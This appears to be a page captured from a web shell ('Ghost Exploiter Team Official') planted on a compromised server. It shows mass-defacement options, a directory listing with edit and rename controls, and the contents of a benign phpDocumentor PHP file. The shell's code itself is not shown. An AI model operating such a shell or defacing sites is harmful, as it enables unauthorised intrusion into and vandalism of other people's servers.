Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
phpdocumentor
/
reflection
/
src
/
phpDocumentor
/
Reflection
/
Php
/
Factory
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
File
--
ren
Reducer
--
ren
AbstractFactory.php
2.563KB
edt
ren
ClassConstant.php
4.196KB
edt
ren
ClassConstantIterator.php
3.574KB
edt
ren
Class_.php
2.386KB
edt
ren
ConstructorPromotion.php
3.278KB
edt
ren
ContextStack.php
2.317KB
edt
ren
Define.php
4.841KB
edt
ren
EnumCase.php
2.379KB
edt
ren
Enum_.php
1.833KB
edt
ren
File.php
5.632KB
edt
ren
Function_.php
2.16KB
edt
ren
GlobalConstant.php
3.002KB
edt
ren
GlobalConstantIterator.php
2.761KB
edt
ren
IfStatement.php
1.197KB
edt
ren
Interface_.php
2.477KB
edt
ren
Method.php
3.056KB
edt
ren
Namespace_.php
1.617KB
edt
ren
Noop.php
0.497KB
edt
ren
Property.php
3.196KB
edt
ren
PropertyBuilder.php
11.121KB
edt
ren
PropertyIterator.php
5.964KB
edt
ren
TraitUse.php
1.46KB
edt
ren
Trait_.php
1.877KB
edt
ren
Type.php
2.197KB
edt
ren
<?php declare(strict_types=1); /** * This file is part of phpDocumentor. * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. * * @link http://phpdoc.org */ namespace phpDocumentor\Reflection\Php\Factory; use Iterator; use Override; use phpDocumentor\Reflection\Fqsen; use PhpParser\Comment\Doc; use PhpParser\Node\Expr; use PhpParser\Node\Stmt\ClassConst; /** * This class acts like a combination of a ClassConst and Const_ * to be able to create constant descriptors using a normal strategy. * * @implements Iterator<int, ClassConstantIterator> */ final class ClassConstantIterator implements Iterator { /** @var int index of the current ClassConst to use */ private int $index = 0; /** * Initializes the class with source data. */ public function __construct(private readonly ClassConst $classConstants) { } /** * Gets line the node started in. * * @return int Line */ public function getLine(): int { return $this->classConstants->getLine(); } /** * Gets line the node ended in. * * @return int Line */ public function getEndLine(): int { return $this->classConstants->getEndLine(); } /** * Returns the name of the current constant. */ public function getName(): string { return (string) $this->classConstants->consts[$this->index]->name; } /** * Returns the fqsen of the current constant. */ public function getFqsen(): Fqsen { return $this->classConstants->consts[$this->index]->getAttribute('fqsen'); } /** * returns true when the current property is public. */ public function isPublic(): bool { return $this->classConstants->isPublic(); } /** * returns true when the current property is protected. */ public function isProtected(): bool { return $this->classConstants->isProtected(); } /** * returns true when the current property is private. */ public function isPrivate(): bool { return $this->classConstants->isPrivate(); } /** * Gets the doc comment of the node. * * The doc comment has to be the last comment associated with the node. */ public function getDocComment(): Doc|null { $docComment = $this->classConstants->consts[$this->index]->getDocComment(); if ($docComment === null) { $docComment = $this->classConstants->getDocComment(); } return $docComment; } public function getValue(): Expr { return $this->classConstants->consts[$this->index]->value; } public function isFinal(): bool { return $this->classConstants->isFinal(); } /** @link http://php.net/manual/en/iterator.current.php */ #[Override] public function current(): self { return $this; } /** @link http://php.net/manual/en/iterator.next.php */ #[Override] public function next(): void { ++$this->index; } /** @link http://php.net/manual/en/iterator.key.php */ #[Override] public function key(): int|null { return $this->index; } /** @link http://php.net/manual/en/iterator.valid.php */ #[Override] public function valid(): bool { return isset($this->classConstants->consts[$this->index]); } /** @link http://php.net/manual/en/iterator.rewind.php */ #[Override] public function rewind(): void { $this->index = 0; } }
<=Back
Liking